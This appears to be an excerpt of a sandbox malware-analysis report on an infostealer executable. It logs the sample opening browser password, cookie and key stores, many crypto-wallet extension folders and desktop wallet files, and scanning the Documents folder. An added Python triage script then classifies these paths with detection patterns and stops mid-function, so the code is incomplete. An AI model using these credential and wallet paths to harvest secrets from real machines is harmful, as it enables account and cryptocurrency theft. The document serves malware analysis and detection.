            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: data%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflad
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflad
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: number of queries: 1001
Source: Yara match | File source: 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xNuh0DUJaG.exe PID: 7464, type: MEMORYSTR
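The file-access events listed above are what turns this sample from "opens some files" into a stealer verdict: it is the combination of browser credential stores (Login Data, Network\Cookies, History, key4.db, cookies.sqlite), browser-extension storage directories, desktop-wallet data and a sweep of the user's Documents folder, all from one process. The script below is an added triage example, not part of the Joe Sandbox report and not LummaC code: it parses behaviour lines in the report's format and groups the touched paths into those data classes. The category names, the path patterns and the "two or more theft categories" threshold are illustrative assumptions; the sample lines are copied from this report.

```python
"""Group the file-access events from a sandbox behaviour log into the data
classes an infostealer goes after.

Added example: not part of the Joe Sandbox report and not LummaC code. The
category names, path patterns and verdict threshold are illustrative
assumptions; the sample lines are copied from the report above.
"""
import re
from collections import defaultdict

# Behaviour lines copied from the report (a representative subset). In the
# exported text the source process, the operation and the "Jump to behavior"
# link text are fused together; the parser below tolerates that.
SAMPLE_EVENTS = r"""
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
"""

# One behaviour line: "Source: <process>[ | ]<operation>: <path>[Jump to behavior]".
EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*"
    r"(?P<op>File opened|Directory queried):\s*"
    r"(?P<path>.+?)(?:\s*Jump to behavior)?\s*$"
)

# Data classes, matched on the tail of the path. Chrome extension IDs are
# 32 letters from the range a-p, so the storage directories are recognisable
# without knowing which wallet or authenticator extension each ID belongs to.
CATEGORIES = {
    "browser_credential_store": re.compile(
        r"\\(Login Data( For Account)?|Network\\Cookies|History|key4\.db|"
        r"logins\.json|cookies\.sqlite|formhistory\.sqlite)$",
        re.IGNORECASE,
    ),
    "browser_extension_storage": re.compile(
        r"\\(Local|Sync) Extension Settings\\[a-p]{32}$"
    ),
    "desktop_wallet": re.compile(
        r"\\(Exodus\\exodus\.wallet|Ledger Live|atomic\\Local Storage\\leveldb|"
        r"Coinomi\\Coinomi\\wallets|Bitcoin\\wallets|Binance|"
        r"com\.liberty\.jaxx\\IndexedDB|Electrum(-LTC)?\\wallets|Guarda\\IndexedDB)$",
        re.IGNORECASE,
    ),
    "user_documents_enumeration": re.compile(r"\\Documents(\\[^\\]+)?$", re.IGNORECASE),
}


def parse_events(text):
    """Return (source, operation, path) tuples for every line that parses."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append((m["src"], m["op"], m["path"]))
    return events


def classify(events):
    """Map each category to the sorted list of distinct paths it matched."""
    hits = defaultdict(set)
    for _src, _op, path in events:
        for name, pattern in CATEGORIES.items():
            if pattern.search(path):
                hits[name].add(path)
    return {name: sorted(paths) for name, paths in hits.items()}


def verdict(hits):
    """Two or more theft-related categories touched by one process is the
    threshold used here (an assumption, not a Joe Sandbox rule)."""
    theft = [c for c in ("browser_credential_store",
                         "browser_extension_storage",
                         "desktop_wallet") if hits.get(c)]
    if len(theft) >= 2:
        return "stealer-like: " + ", ".join(theft)
    if theft:
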